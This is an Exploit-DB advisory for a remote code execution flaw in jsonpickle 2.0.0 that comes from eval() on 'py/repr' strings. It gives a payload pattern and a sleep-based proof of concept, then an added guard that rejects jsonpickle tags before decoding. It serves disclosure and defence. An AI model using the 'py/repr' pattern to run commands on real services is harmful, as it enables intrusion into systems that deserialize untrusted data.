python jsonpickle 2.0.0 – Remote Code Execution

  • Author: Adi Malyanker
    Date: 2021-02-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49585/
  • # Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
    # Date: 24-2-2021
    # Vendor Homepage: https://jsonpickle.github.io
    # Exploit Author: Adi Malyanker, Shay Reuven
    # Software Link: https://github.com/jsonpickle/jsonpickle
    # Version: 2.0.0
    # Tested on: windows, linux
    
    # Python is an open source language. The jsonpickle module is provided to convert objects into a serialized form,
    # and later recover the data back into an object. decode() is used to deserialize serialized strings.
    
    # If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
    # The problem is in the internal loadrepr function, which evals each serialized string that contains "py/repr".
    
    # The vulnerability exists from the first version to the current version, for backward compatibility. No patch is provided yet.
    
    # The payload was found during our research on deserialization functions.
    
    # The pattern should be:
    # {..{"py/repr":<the module to import>/<the command to be executed.>}..}
    
    # example:
    
    import jsonpickle
    
    malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
    
    # the command on the server side
    some_parameter = jsonpickle.decode(malicious)
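Since the advisory notes that no patch is available, the practical mitigation on the receiving side is to refuse jsonpickle's reconstruction tags before decode() ever sees untrusted input. The guard below is an added example, not code from the advisory or from jsonpickle: it parses the text with the standard json module, walks the result, and reports the location of every "py/" key (py/repr, py/id, py/object and the rest), so only plain-data documents are handed on. The function names and the benign sample record are constructed for this example.

```python
"""Pre-decode guard for untrusted jsonpickle input (example code, not part of
the advisory or of jsonpickle). Parse with json, reject any jsonpickle tag,
and only then consider calling jsonpickle.decode on the accepted text."""
import json

# Every jsonpickle reserved key starts with this prefix. py/repr is the one
# routed through loadrepr's eval(), but a plain-data API has no legitimate
# use for any of them, so the whole namespace is rejected.
RESERVED_PREFIX = "py/"


def find_reserved_keys(node, path="$"):
    """Return JSONPath-like locations of every reserved key below node."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if isinstance(key, str) and key.startswith(RESERVED_PREFIX):
                hits.append(child)
            hits.extend(find_reserved_keys(value, child))
    elif isinstance(node, list):
        for idx, item in enumerate(node):
            hits.extend(find_reserved_keys(item, f"{path}[{idx}]"))
    return hits


def safe_load(text):
    """Parse text as plain JSON and refuse it if it carries jsonpickle tags.

    Returns (True, data) for clean input or (False, reasons) otherwise; the
    reasons list is suitable for logging at the point of rejection.
    """
    try:
        data = json.loads(text)
    except (ValueError, RecursionError) as exc:
        return False, [f"invalid JSON: {exc}"]
    hits = find_reserved_keys(data)
    if hits:
        return False, [f"jsonpickle tag at {h}" for h in hits]
    return True, data


# Constructed inputs: the payload quoted in the advisory and a benign record.
MALICIOUS = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
BENIGN = '{"user": "alice", "roles": ["reader"], "quota": 10}'

if __name__ == "__main__":
    for sample in (MALICIOUS, BENIGN):
        accepted, detail = safe_load(sample)
        print("accepted" if accepted else "rejected", detail)
```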